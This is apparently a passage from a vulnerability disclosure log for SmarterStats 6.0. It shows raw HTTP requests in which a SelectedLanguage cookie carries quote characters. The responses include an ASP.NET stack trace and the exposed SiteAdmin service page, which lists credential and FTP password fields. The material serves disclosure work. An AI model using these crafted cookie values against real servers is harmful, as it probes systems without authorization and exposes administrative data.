Host: vulnerable.smarterstats.6.0.host:9999
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.smarterstats.6.0.host:9999/Services/SiteAdmin.asmx
Cookie: SelectedLanguage='; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}; ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; loginsettings=;

Response 1

HTTP/2.0 500 Internal Server Error
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 07:01:21 GMT
X-AspNet-Version: 4.0.30319
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 7512
Connection: Close

<html>
<head>
<title>Undefined complexType 'http://schemas.xmlsoap.org/soap/encoding/:Array' is used as a base for complex type restriction.</title>
<style>
body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}
b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}
H1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }
H2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }
pre {font-family:"Lucida Console";font-size: .9em}
.marker {font-weight: bold; color: black;text-decoration: none;}
.version {color: gray;}
.error {margin-bottom: 10px;}
.expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }
</style>
</head>

<body bgcolor="white">

<span><H1>Server Error in '/' Application.<hr width=100% size=1 color=silver></H1>

<h2> <i>Undefined complexType 'http://schemas.xmlsoap.org/soap/encoding/:Array' is used as a base for complex type restriction.</i> </h2></span>

<font face="Arial, Helvetica, Geneva, SunSans-Regular, sans-serif ">

<b> Description: </b>An unhandled exception occurred during the execution of the current web request. Please review the stack trace for more information about the error and where it originated in the code.

<br><br>

<b> Exception Details: </b>System.Xml.Schema.XmlSchemaException: Undefined complexType 'http://schemas.xmlsoap.org/soap/encoding/:Array' is used as a base for complex type restriction.<br><br>

<b>Source Error:</b> <br><br>

<table width=100% bgcolor="#ffffcc">
<tr>
<td>
<code>

The source code that generated this unhandled exception can only be shown when compiled in debug mode. To enable this, please follow one of the below steps, then request the URL:<br><br>1. Add a &quot;Debug=true&quot; directive at the top of the file that generated the error. Example:<br><br> &nbsp;&nbsp;&lt;%@ Page Language=&quot;C#&quot; Debug=&quot;true&quot; %&gt;<br><br>or:<br><br>2) Add the following section to the configuration file of your application:<br><br>&lt;configuration&gt;<br> &nbsp;&nbsp;&nbsp;&lt;system.web&gt;<br> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&lt;compilation debug=&quot;true&quot;/&gt;<br> &nbsp;&nbsp;&nbsp;&lt;/system.web&gt;<br>&lt;/configuration&gt;<br><br> Note that this second technique will cause all files within a given application to be compiled in debug mode. The first technique will cause only that particular file to be compiled in debug mode.<br><br>Important: Running applications in debug mode does incur a memory/performance overhead. You should make sure that an application has debugging disabled before deploying into production scenario.</code>

</td>
</tr>
</table>

<br>

<b>Stack Trace:</b> <br><br>

<table width=100% bgcolor="#ffffcc">
<tr>
<td>
<code><pre>

[XmlSchemaException: Undefined complexType &#39;http://schemas.xmlsoap.org/soap/encoding/:Array&#39; is used as a base for complex type restriction.]
System.Xml.Schema.XmlSchemaSet.InternalValidationCallback(Object sender, ValidationEventArgs e) +26
System.Xml.Schema.Compiler.CompileComplexType(XmlSchemaComplexType complexType) +540
System.Xml.Schema.Compiler.Compile() +772
System.Xml.Schema.XmlSchemaSet.Compile() +742
System.Xml.Serialization.XmlSchemas.Compile(ValidationEventHandler handler, Boolean fullCompile) +1109
System.Web.Services.Description.SchemaCompiler.Compile(XmlSchemas schemas) +204
System.Web.Services.Description.WebServicesInteroperability.AnalyzeDescription(ServiceDescriptionCollection descriptions, BasicProfileViolationCollection violations) +190
System.Web.Services.Description.WebServicesInteroperability.CheckConformance(WsiProfiles claims, ServiceDescriptionCollection descriptions, BasicProfileViolationCollection violations) +75
ASP.defaultwsdlhelpgenerator_aspx.Page_Load(Object sender, EventArgs e) +2222
System.Web.Util.CalliHelper.EventArgFunctionCaller(IntPtr fp, Object o, Object t, EventArgs e) +25
System.Web.UI.Control.LoadRecursive() +95
System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint) +2760
</pre></code>

</td>
</tr>
</table>

<br>

<hr width=100% size=1 color=silver>

<b>Version Information:</b>&nbsp;Microsoft .NET Framework Version:4.0.30319; ASP.NET Version:4.0.30319.1

</font>

</body>
</html>
<!--
[XmlSchemaException]: Undefined complexType &#39;http://schemas.xmlsoap.org/soap/encoding/:Array&#39; is used as a base for complex type restriction.
at System.Xml.Schema.XmlSchemaSet.InternalValidationCallback(Object sender, ValidationEventArgs e)
at System.Xml.Schema.Compiler.CompileComplexType(XmlSchemaComplexType complexType)
at System.Xml.Schema.Compiler.Compile()
at System.Xml.Schema.XmlSchemaSet.Compile()
at System.Xml.Serialization.XmlSchemas.Compile(ValidationEventHandler handler, Boolean fullCompile)
at System.Web.Services.Description.SchemaCompiler.Compile(XmlSchemas schemas)
at System.Web.Services.Description.WebServicesInteroperability.AnalyzeDescription(ServiceDescriptionCollection descriptions, BasicProfileViolationCollection violations)
at System.Web.Services.Description.WebServicesInteroperability.CheckConformance(WsiProfiles claims, ServiceDescriptionCollection descriptions, BasicProfileViolationCollection violations)
at ASP.defaultwsdlhelpgenerator_aspx.Page_Load(Object sender, EventArgs e)
at System.Web.Util.CalliHelper.EventArgFunctionCaller(IntPtr fp, Object o, Object t, EventArgs e)
at System.Web.UI.Control.LoadRecursive()
at System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint)
[HttpUnhandledException]: Exception of type &#39;System.Web.HttpUnhandledException&#39; was thrown.
at System.Web.UI.Page.HandleError(Exception e)
at System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint)
at System.Web.UI.Page.ProcessRequest(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint)
at System.Web.UI.Page.ProcessRequest()
at System.Web.UI.Page.ProcessRequest(HttpContext context)
at System.Web.Services.Protocols.DocumentationServerProtocol.WriteReturns(Object[] returnValues, Stream outputStream)
[InvalidOperationException]: The XML Web service help page encountered an internal error.
at System.Web.Services.Protocols.WebServiceHandler.WriteException(Exception e)
at System.Web.Services.Protocols.WebServiceHandler.CoreProcessRequest()
at System.Web.Services.Protocols.SyncSessionlessHandler.ProcessRequest(HttpContext context)
at System.Web.HttpApplication.CallHandlerExecutionStep.System.Web.HttpApplication.IExecutionStep.Execute()
at System.Web.HttpApplication.ExecuteStep(IExecutionStep step, Boolean& completedSynchronously)
-->

Request 2

GET /Services/SiteAdmin.asmx?op=GetAllSites2 HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.smarterstats.6.0.host:9999/Services/SiteAdmin.asmx
Cookie: SelectedLanguage=''; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}; ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; loginsettings=;

Response 2

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 07:01:22 GMT
X-AspNet-Version: 4.0.30319
Cache-Control: private, max-age=0
Content-Type: text/html; charset=utf-8
Content-Length: 28998
Connection: Close



<html>

<head><link rel="alternate" type="text/xml" href="/Services/SiteAdmin.asmx?disco" />

<style type="text/css">

       BODY { color: #000000; background-color: white; font-family: Verdana; margin-left: 0px; margin-top: 0px; }
       #content { margin-left: 30px; font-size: .70em; padding-bottom: 2em; }
       A:link { color: #336699; font-weight: bold; text-decoration: underline; }
       A:visited { color: #6699cc; font-weight: bold; text-decoration: underline; }
       A:active { color: #336699; font-weight: bold; text-decoration: underline; }
       A:hover { color: cc3300; font-weight: bold; text-decoration: underline; }
       P { color: #000000; margin-top: 0px; margin-bottom: 12px; font-family: Verdana; }
       pre { background-color: #e5e5cc; padding: 5px; font-family: Courier New; font-size: x-small; margin-top: -5px; border: 1px #f0f0e0 solid; }
       td { color: #000000; font-family: Verdana; font-size: .7em; }
       h2 { font-size: 1.5em; font-weight: bold; margin-top: 25px; margin-bottom: 10px; border-top: 1px solid #003366; margin-left: -15px; color: #003366; }
       h3 { font-size: 1.1em; color: #000000; margin-left: -15px; margin-top: 10px; margin-bottom: 10px; }
       ul { margin-top: 10px; margin-left: 20px; }
       ol { margin-top: 10px; margin-left: 20px; }
       li { margin-top: 10px; color: #000000; }
       font.value { color: darkblue; font: bold; }
       font.key { color: darkgreen; font: bold; }
       font.error { color: darkred; font: bold; }
       .heading1 { color: #ffffff; font-family: Tahoma; font-size: 26px; font-weight: normal; background-color: #003366; margin-top: 0px; margin-bottom: 0px; margin-left: -30px; padding-top: 10px; padding-bottom: 3px; padding-left: 15px; width: 105%; }
       .button { background-color: #dcdcdc; font-family: Verdana; font-size: 1em; border-top: #cccccc 1px solid; border-bottom: #666666 1px solid; border-left: #cccccc 1px solid; border-right: #666666 1px solid; }
       .frmheader { color: #000000; background: #dcdcdc; font-family: Verdana; font-size: .7em; font-weight: normal; border-bottom: 1px solid #dcdcdc; padding-top: 2px; padding-bottom: 2px; }
       .frmtext { font-family: Verdana; font-size: .7em; margin-top: 8px; margin-bottom: 0px; margin-left: 32px; }
       .frmInput { font-family: Verdana; font-size: 1em; }
       .intro { margin-left: -15px; }

</style>

<title>
   SiteAdmin Web Service
</title></head>

<body>

<div id="content">

<p class="heading1">SiteAdmin</p><br>





<span>
<p class="intro">Click <a href="SiteAdmin.asmx">here</a> for a complete list of operations.</p>
<h2>GetAllSites2</h2>
<p class="intro">Returns all sites listed in the MRS with multiple log locations.</p>

<h3>Test</h3>

To test the operation using the HTTP POST protocol, click the 'Invoke' button.



<form target="_blank" action='http://localhost:9999/Services/SiteAdmin.asmx/GetAllSites2' method="POST">

<table cellspacing="0" cellpadding="4" frame="box" bordercolor="#dcdcdc" rules="none" style="border-collapse: collapse;">
<tr>
   <td class="frmHeader" background="#dcdcdc" style="border-right: 2px solid white;">Parameter</td>
   <td class="frmHeader" background="#dcdcdc">Value</td>
</tr>


<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">authUserName:</td>
<td><input class="frmInput" type="text" size="50" name="authUserName"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">authPassword:</td>
<td><input class="frmInput" type="text" size="50" name="authPassword"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">IncludeDetails:</td>
<td><input class="frmInput" type="text" size="50" name="IncludeDetails"></td>
</tr>

<tr>
<td></td>
<td align="right"> <input type="submit" value="Invoke" class="button"></td>
</tr>
</table>


</form>
<span>
<h3>SOAP 1.1</h3>
<p>The following is a sample SOAP 1.1 request and response. The <font class=value>placeholders</font> shown need to be replaced with actual values.</p>

<pre>POST /Services/SiteAdmin.asmx HTTP/1.1
Host: localhost
Content-Type: text/xml; charset=utf-8
Content-Length: <font class=value>length</font>
SOAPAction: "http://www.smartertools.com/smarterstats/SiteAdmin.asmx/GetAllSites2"

&lt;?xml version="1.0" encoding="utf-8"?&gt;
&lt;soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"&gt;
&lt;soap:Body&gt;
&lt;GetAllSites2 xmlns="http://www.smartertools.com/smarterstats/SiteAdmin.asmx"&gt;
&lt;authUserName&gt;<font class=value>string</font>&lt;/authUserName&gt;
&lt;authPassword&gt;<font class=value>string</font>&lt;/authPassword&gt;
&lt;IncludeDetails&gt;<font class=value>boolean</font>&lt;/IncludeDetails&gt;
&lt;/GetAllSites2&gt;
&lt;/soap:Body&gt;
&lt;/soap:Envelope&gt;</pre>

<pre>HTTP/1.1 200 OK
Content-Type: text/xml; charset=utf-8
Content-Length: <font class=value>length</font>

&lt;?xml version="1.0" encoding="utf-8"?&gt;
&lt;soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"&gt;
&lt;soap:Body&gt;
&lt;GetAllSites2Response xmlns="http://www.smartertools.com/smarterstats/SiteAdmin.asmx"&gt;
&lt;GetAllSites2Result&gt;
&lt;Result&gt;<font class=value>boolean</font>&lt;/Result&gt;
&lt;ResultCode&gt;<font class=value>int</font>&lt;/ResultCode&gt;
&lt;Message&gt;<font class=value>string</font>&lt;/Message&gt;
&lt;Sites&gt;
&lt;SiteSettingInfo&gt;
&lt;ServerID&gt;<font class=value>int</font>&lt;/ServerID&gt;
&lt;SiteID&gt;<font class=value>int</font>&lt;/SiteID&gt;
&lt;DomainName&gt;<font class=value>string</font>&lt;/DomainName&gt;
&lt;LogFormat&gt;<font class=value>string</font>&lt;/LogFormat&gt;
&lt;SmarterLogDirectory&gt;<font class=value>string</font>&lt;/SmarterLogDirectory&gt;
&lt;SmarterLogMonthsBeforeDelete&gt;<font class=value>int</font>&lt;/SmarterLogMonthsBeforeDelete&gt;
&lt;ExportPath&gt;<font class=value>string</font>&lt;/ExportPath&gt;
&lt;ExportPathURL&gt;<font class=value>string</font>&lt;/ExportPathURL&gt;
&lt;TimeZoneIndex&gt;<font class=value>int</font>&lt;/TimeZoneIndex&gt;
&lt;LogLocations xsi:nil="true" /&gt;
&lt;SiteStatus&gt;<font class=value>string</font>&lt;/SiteStatus&gt;
&lt;ftp_Enabled&gt;<font class=value>boolean</font>&lt;/ftp_Enabled&gt;
&lt;ftp_Server&gt;<font class=value>string</font>&lt;/ftp_Server&gt;
&lt;ftp_port&gt;<font class=value>int</font>&lt;/ftp_port&gt;
&lt;ftp_Username&gt;<font class=value>string</font>&lt;/ftp_Username&gt;
&lt;ftp_Password&gt;<font class=value>string</font>&lt;/ftp_Password&gt;
&lt;ftp_Interval&gt;<font class=value>int</font>&lt;/ftp_Interval&gt;
&lt;ftp_Directory&gt;<font class=value>string</font>&lt;/ftp_Directory&gt;
&lt;ftp_LogWildcard&gt;<font class=value>string</font>&lt;/ftp_LogWildcard&gt;
&lt;ftp_LogMaxDays&gt;<font class=value>int</font>&lt;/ftp_LogMaxDays&gt;
&lt;ftp_ProxyType&gt;<font class=value>string</font>&lt;/ftp_ProxyType&gt;
&lt;ftp_ProxyAddress&gt;<font class=value>string</font>&lt;/ftp_ProxyAddress&gt;
&lt;ftp_ProxyPort&gt;<font class=value>int</font>&lt;/ftp_ProxyPort&gt;
&lt;ftp_ProxyUsername&gt;<font class=value>string</font>&lt;/ftp_ProxyUsername&gt;
&lt;ftp_ProxyPassword&gt;<font class=value>string</font>&lt;/ftp_ProxyPassword&gt;
&lt;/SiteSettingInfo&gt;
&lt;SiteSettingInfo&gt;
&lt;ServerID&gt;<font class=value>int</font>&lt;/ServerID&gt;
&lt;SiteID&gt;<font class=value>int</font>&lt;/SiteID&gt;
&lt;DomainName&gt;<font class=value>string</font>&lt;/DomainName&gt;
&lt;LogFormat&gt;<font class=value>string</font>&lt;/LogFormat&gt;
&lt;SmarterLogDirectory&gt;<font class=value>string</font>&lt;/SmarterLogDirectory&gt;
&lt;SmarterLogMonthsBeforeDelete&gt;<font class=value>int</font>&lt;/SmarterLogMonthsBeforeDelete&gt;
&lt;ExportPath&gt;<font class=value>string</font>&lt;/ExportPath&gt;
&lt;ExportPathURL&gt;<font class=value>string</font>&lt;/ExportPathURL&gt;
&lt;TimeZoneIndex&gt;<font class=value>int</font>&lt;/TimeZoneIndex&gt;
&lt;LogLocations xsi:nil="true" /&gt;
&lt;SiteStatus&gt;<font class=value>string</font>&lt;/SiteStatus&gt;
&lt;ftp_Enabled&gt;<font class=value>boolean</font>&lt;/ftp_Enabled&gt;
&lt;ftp_Server&gt;<font class=value>string</font>&lt;/ftp_Server&gt;
&lt;ftp_port&gt;<font class=value>int</font>&lt;/ftp_port&gt;
&lt;ftp_Username&gt;<font class=value>string</font>&lt;/ftp_Username&gt;
&lt;ftp_Password&gt;<font class=value>string</font>&lt;/ftp_Password&gt;
&lt;ftp_Interval&gt;<font class=value>int</font>&lt;/ftp_Interval&gt;
&lt;ftp_Directory&gt;<font class=value>string</font>&lt;/ftp_Directory&gt;
&lt;ftp_LogWildcard&gt;<font class=value>string</font>&lt;/ftp_LogWildcard&gt;
&lt;ftp_LogMaxDays&gt;<font class=value>int</font>&lt;/ftp_LogMaxDays&gt;
&lt;ftp_ProxyType&gt;<font class=value>string</font>&lt;/ftp_ProxyType&gt;
&lt;ftp_ProxyAddress&gt;<font class=value>string</font>&lt;/ftp_ProxyAddress&gt;
&lt;ftp_ProxyPort&gt;<font class=value>int</font>&lt;/ftp_ProxyPort&gt;
&lt;ftp_ProxyUsername&gt;<font class=value>string</font>&lt;/ftp_ProxyUsername&gt;
&lt;ftp_ProxyPassword&gt;<font class=value>string</font>&lt;/ftp_ProxyPassword&gt;
&lt;/SiteSettingInfo&gt;
&lt;/Sites&gt;
&lt;/GetAllSites2Result&gt;
&lt;/GetAllSites2Response&gt;
&lt;/soap:Body&gt;
&lt;/soap:Envelope&gt;</pre>
</span>

<span>
<h3>SOAP 1.2</h3>
<p>The following is a sample SOAP 1.2 request and response. The <font class=value>placeholders</font> shown need to be replaced with actual values.</p>

<pre>POST /Services/SiteAdmin.asmx HTTP/1.1
Host: localhost
Content-Type: application/soap+xml; charset=utf-8
Content-Length: <font class=value>length</font>

&lt;?xml version="1.0" encoding="utf-8"?&gt;
&lt;soap12:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap12="http://www.w3.org/2003/05/soap-envelope"&gt;
&lt;soap12:Body&gt;
&lt;GetAllSites2 xmlns="http://www.smartertools.com/smarterstats/SiteAdmin.asmx"&gt;
&lt;authUserName&gt;<font class=value>string</font>&lt;/authUserName&gt;
&lt;authPassword&gt;<font class=value>string</font>&lt;/authPassword&gt;
&lt;IncludeDetails&gt;<font class=value>boolean</font>&lt;/IncludeDetails&gt;
&lt;/GetAllSites2&gt;
&lt;/soap12:Body&gt;
&lt;/soap12:Envelope&gt;</pre>

<pre>HTTP/1.1 200 OK
Content-Type: application/soap+xml; charset=utf-8
Content-Length: <font class=value>length</font>

&lt;?xml version="1.0" encoding="utf-8"?&gt;
&lt;soap12:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap12="http://www.w3.org/2003/05/soap-envelope"&gt;
&lt;soap12:Body&gt;
&lt;GetAllSites2Response xmlns="http://www.smartertools.com/smarterstats/SiteAdmin.asmx"&gt;
&lt;GetAllSites2Result&gt;
&lt;Result&gt;<font class=value>boolean</font>&lt;/Result&gt;
&lt;ResultCode&gt;<font class=value>int</font>&lt;/ResultCode&gt;
&lt;Message&gt;<font class=value>string</font>&lt;/Message&gt;
&lt;Sites&gt;
&lt;SiteSettingInfo&gt;
&lt;ServerID&gt;<font class=value>int</font>&lt;/ServerID&gt;
&lt;SiteID&gt;<font class=value>int</font>&lt;/SiteID&gt;
&lt;DomainName&gt;<font class=value>string</font>&lt;/DomainName&gt;
&lt;LogFormat&gt;<font class=value>string</font>&lt;/LogFormat&gt;
&lt;SmarterLogDirectory&gt;<font class=value>string</font>&lt;/SmarterLogDirectory&gt;
&lt;SmarterLogMonthsBeforeDelete&gt;<font class=value>int</font>&lt;/SmarterLogMonthsBeforeDelete&gt;
&lt;ExportPath&gt;<font class=value>string</font>&lt;/ExportPath&gt;
&lt;ExportPathURL&gt;<font class=value>string</font>&lt;/ExportPathURL&gt;
&lt;TimeZoneIndex&gt;<font class=value>int</font>&lt;/TimeZoneIndex&gt;
&lt;LogLocations xsi:nil="true" /&gt;
&lt;SiteStatus&gt;<font class=value>string</font>&lt;/SiteStatus&gt;
&lt;ftp_Enabled&gt;<font class=value>boolean</font>&lt;/ftp_Enabled&gt;
&lt;ftp_Server&gt;<font class=value>string</font>&lt;/ftp_Server&gt;
&lt;ftp_port&gt;<font class=value>int</font>&lt;/ftp_port&gt;
&lt;ftp_Username&gt;<font class=value>string</font>&lt;/ftp_Username&gt;
&lt;ftp_Password&gt;<font class=value>string</font>&lt;/ftp_Password&gt;
&lt;ftp_Interval&gt;<font class=value>int</font>&lt;/ftp_Interval&gt;
&lt;ftp_Directory&gt;<font class=value>string</font>&lt;/ftp_Directory&gt;
&lt;ftp_LogWildcard&gt;<font class=value>string</font>&lt;/ftp_LogWildcard&gt;
&lt;ftp_LogMaxDays&gt;<font class=value>int</font>&lt;/ftp_LogMaxDays&gt;
&lt;ftp_ProxyType&gt;<font class=value>string</font>&lt;/ftp_ProxyType&gt;
&lt;ftp_ProxyAddress&gt;<font class=value>string</font>&lt;/ftp_ProxyAddress&gt;
&lt;ftp_ProxyPort&gt;<font class=value>int</font>&lt;/ftp_ProxyPort&gt;
&lt;ftp_ProxyUsername&gt;<font class=value>string</font>&lt;/ftp_ProxyUsername&gt;
&lt;ftp_ProxyPassword&gt;<font class=value>string</font>&lt;/ftp_ProxyPassword&gt;
&lt;/SiteSettingInfo&gt;
&lt;SiteSettingInfo&gt;
&lt;ServerID&gt;<font class=value>int</font>&lt;/ServerID&gt;
&lt;SiteID&gt;<font class=value>int</font>&lt;/SiteID&gt;
&lt;DomainName&gt;<font class=value>string</font>&lt;/DomainName&gt;
&lt;LogFormat&gt;<font class=value>string</font>&lt;/LogFormat&gt;
&lt;SmarterLogDirectory&gt;<font class=value>string</font>&lt;/SmarterLogDirectory&gt;
&lt;SmarterLogMonthsBeforeDelete&gt;<font class=value>int</font>&lt;/SmarterLogMonthsBeforeDelete&gt;
&lt;ExportPath&gt;<font class=value>string</font>&lt;/ExportPath&gt;
&lt;ExportPathURL&gt;<font class=value>string</font>&lt;/ExportPathURL&gt;
&lt;TimeZoneIndex&gt;<font class=value>int</font>&lt;/TimeZoneIndex&gt;
&lt;LogLocations xsi:nil="true" /&gt;
&lt;SiteStatus&gt;<font class=value>string</font>&lt;/SiteStatus&gt;
&lt;ftp_Enabled&gt;<font class=value>boolean</font>&lt;/ftp_Enabled&gt;
&lt;ftp_Server&gt;<font class=value>string</font>&lt;/ftp_Server&gt;
&lt;ftp_port&gt;<font class=value>int</font>&lt;/ftp_port&gt;
&lt;ftp_Username&gt;<font class=value>string</font>&lt;/ftp_Username&gt;
&lt;ftp_Password&gt;<font class=value>string</font>&lt;/ftp_Password&gt;
&lt;ftp_Interval&gt;<font class=value>int</font>&lt;/ftp_Interval&gt;
&lt;ftp_Directory&gt;<font class=value>string</font>&lt;/ftp_Directory&gt;
&lt;ftp_LogWildcard&gt;<font class=value>string</font>&lt;/ftp_LogWildcard&gt;
&lt;ftp_LogMaxDays&gt;<font class=value>int</font>&lt;/ftp_LogMaxDays&gt;
&lt;ftp_ProxyType&gt;<font class=value>string</font>&lt;/ftp_ProxyType&gt;
&lt;ftp_ProxyAddress&gt;<font class=value>string</font>&lt;/ftp_ProxyAddress&gt;
&lt;ftp_ProxyPort&gt;<font class=value>int</font>&lt;/ftp_ProxyPort&gt;
&lt;ftp_ProxyUsername&gt;<font class=value>string</font>&lt;/ftp_ProxyUsername&gt;
&lt;ftp_ProxyPassword&gt;<font class=value>string</font>&lt;/ftp_ProxyPassword&gt;
&lt;/SiteSettingInfo&gt;
&lt;/Sites&gt;
&lt;/GetAllSites2Result&gt;
&lt;/GetAllSites2Response&gt;
&lt;/soap12:Body&gt;
&lt;/soap12:Envelope&gt;</pre>
</span>

<span>
<h3>HTTP GET</h3>
<p>The following is a sample HTTP GET request and response. The <font class=value>placeholders</font> shown need to be replaced with actual values.</p>

<pre>GET /Services/SiteAdmin.asmx/GetAllSites2?<font class=key>authUserName</font>=<font class=value>string</font>&amp;<font class=key>authPassword</font>=<font class=value>string</font>&amp;<font class=key>IncludeDetails</font>=<font class=value>string</font> HTTP/1.1
Host: localhost
</pre>

<pre>HTTP/1.1 200 OK
Content-Type: text/xml; charset=utf-8
Content-Length: <font class=value>length</font>

&lt;?xml version="1.0" encoding="utf-8"?&gt;
&lt;SiteSettingInfoArrayResult xmlns="http://www.smartertools.com/smarterstats/SiteAdmin.asmx"&gt;
&lt;Result&gt;<font class=value>boolean</font>&lt;/Result&gt;
&lt;ResultCode&gt;<font class=value>int</font>&lt;/ResultCode&gt;
&lt;Message&gt;<font class=value>string</font>&lt;/Message&gt;
&lt;Sites&gt;
&lt;SiteSettingInfo&gt;
&lt;ServerID&gt;<font class=value>int</font>&lt;/ServerID&gt;
&lt;SiteID&gt;<font class=value>int</font>&lt;/SiteID&gt;
&lt;DomainName&gt;<font class=value>string</font>&lt;/DomainName&gt;
&lt;LogFormat&gt;<font class=value>string</font>&lt;/LogFormat&gt;
&lt;SmarterLogDirectory&gt;<font class=value>string</font>&lt;/SmarterLogDirectory&gt;
&lt;SmarterLogMonthsBeforeDelete&gt;<font class=value>int</font>&lt;/SmarterLogMonthsBeforeDelete&gt;
&lt;ExportPath&gt;<font class=value>string</font>&lt;/ExportPath&gt;
&lt;ExportPathURL&gt;<font class=value>string</font>&lt;/ExportPathURL&gt;
&lt;TimeZoneIndex&gt;<font class=value>int</font>&lt;/TimeZoneIndex&gt;
&lt;LogLocations&gt;
&lt;ConfigLogLocation d5p1:nil="true" xmlns:d5p1="http://www.w3.org/2001/XMLSchema-instance" /&gt;
&lt;ConfigLogLocation d5p1:nil="true" xmlns:d5p1="http://www.w3.org/2001/XMLSchema-instance" /&gt;
&lt;/LogLocations&gt;
&lt;SiteStatus&gt;<font class=value>string</font>&lt;/SiteStatus&gt;
&lt;ftp_Enabled&gt;<font class=value>boolean</font>&lt;/ftp_Enabled&gt;
&lt;ftp_Server&gt;<font class=value>string</font>&lt;/ftp_Server&gt;
&lt;ftp_port&gt;<font class=value>int</font>&lt;/ftp_port&gt;
&lt;ftp_Username&gt;<font class=value>string</font>&lt;/ftp_Username&gt;
&lt;ftp_Password&gt;<font class=value>string</font>&lt;/ftp_Password&gt;
&lt;ftp_Interval&gt;<font class=value>int</font>&lt;/ftp_Interval&gt;
&lt;ftp_Directory&gt;<font class=value>string</font>&lt;/ftp_Directory&gt;
&lt;ftp_LogWildcard&gt;<font class=value>string</font>&lt;/ftp_LogWildcard&gt;
&lt;ftp_LogMaxDays&gt;<font class=value>int</font>&lt;/ftp_LogMaxDays&gt;
&lt;ftp_ProxyType&gt;<font class=value>string</font>&lt;/ftp_ProxyType&gt;
&lt;ftp_ProxyAddress&gt;<font class=value>string</font>&lt;/ftp_ProxyAddress&gt;
&lt;ftp_ProxyPort&gt;<font class=value>int</font>&lt;/ftp_ProxyPort&gt;
&lt;ftp_ProxyUsername&gt;<font class=value>string</font>&lt;/ftp_ProxyUsername&gt;
&lt;ftp_ProxyPassword&gt;<font class=value>string</font>&lt;/ftp_ProxyPassword&gt;
&lt;/SiteSettingInfo&gt;
&lt;SiteSettingInfo&gt;
&lt;ServerID&gt;<font class=value>int</font>&lt;/ServerID&gt;
&lt;SiteID&gt;<font class=value>int</font>&lt;/SiteID&gt;
&lt;DomainName&gt;<font class=value>string</font>&lt;/DomainName&gt;
&lt;LogFormat&gt;<font class=value>string</font>&lt;/LogFormat&gt;
&lt;SmarterLogDirectory&gt;<font class=value>string</font>&lt;/SmarterLogDirectory&gt;
&lt;SmarterLogMonthsBeforeDelete&gt;<font class=value>int</font>&lt;/SmarterLogMonthsBeforeDelete&gt;
&lt;ExportPath&gt;<font class=value>string</font>&lt;/ExportPath&gt;
&lt;ExportPathURL&gt;<font class=value>string</font>&lt;/ExportPathURL&gt;
&lt;TimeZoneIndex&gt;<font class=value>int</font>&lt;/TimeZoneIndex&gt;
&lt;LogLocations&gt;
&lt;ConfigLogLocation d5p1:nil="true" xmlns:d5p1="http://www.w3.org/2001/XMLSchema-instance" /&gt;
&lt;ConfigLogLocation d5p1:nil="true" xmlns:d5p1="http://www.w3.org/2001/XMLSchema-instance" /&gt;
&lt;/LogLocations&gt;
&lt;SiteStatus&gt;<font class=value>string</font>&lt;/SiteStatus&gt;
&lt;ftp_Enabled&gt;<font class=value>boolean</font>&lt;/ftp_Enabled&gt;
&lt;ftp_Server&gt;<font class=value>string</font>&lt;/ftp_Server&gt;
&lt;ftp_port&gt;<font class=value>int</font>&lt;/ftp_port&gt;
&lt;ftp_Username&gt;<font class=value>string</font>&lt;/ftp_Username&gt;
&lt;ftp_Password&gt;<font class=value>string</font>&lt;/ftp_Password&gt;
&lt;ftp_Interval&gt;<font class=value>int</font>&lt;/ftp_Interval&gt;
&lt;ftp_Directory&gt;<font class=value>string</font>&lt;/ftp_Directory&gt;
&lt;ftp_LogWildcard&gt;<font class=value>string</font>&lt;/ftp_LogWildcard&gt;
&lt;ftp_LogMaxDays&gt;<font class=value>int</font>&lt;/ftp_LogMaxDays&gt;
&lt;ftp_ProxyType&gt;<font class=value>string</font>&lt;/ftp_ProxyType&gt;
&lt;ftp_ProxyAddress&gt;<font class=value>string</font>&lt;/ftp_ProxyAddress&gt;
&lt;ftp_ProxyPort&gt;<font class=value>int</font>&lt;/ftp_ProxyPort&gt;
&lt;ftp_ProxyUsername&gt;<font class=value>string</font>&lt;/ftp_ProxyUsername&gt;
&lt;ftp_ProxyPassword&gt;<font class=value>string</font>&lt;/ftp_ProxyPassword&gt;
&lt;/SiteSettingInfo&gt;
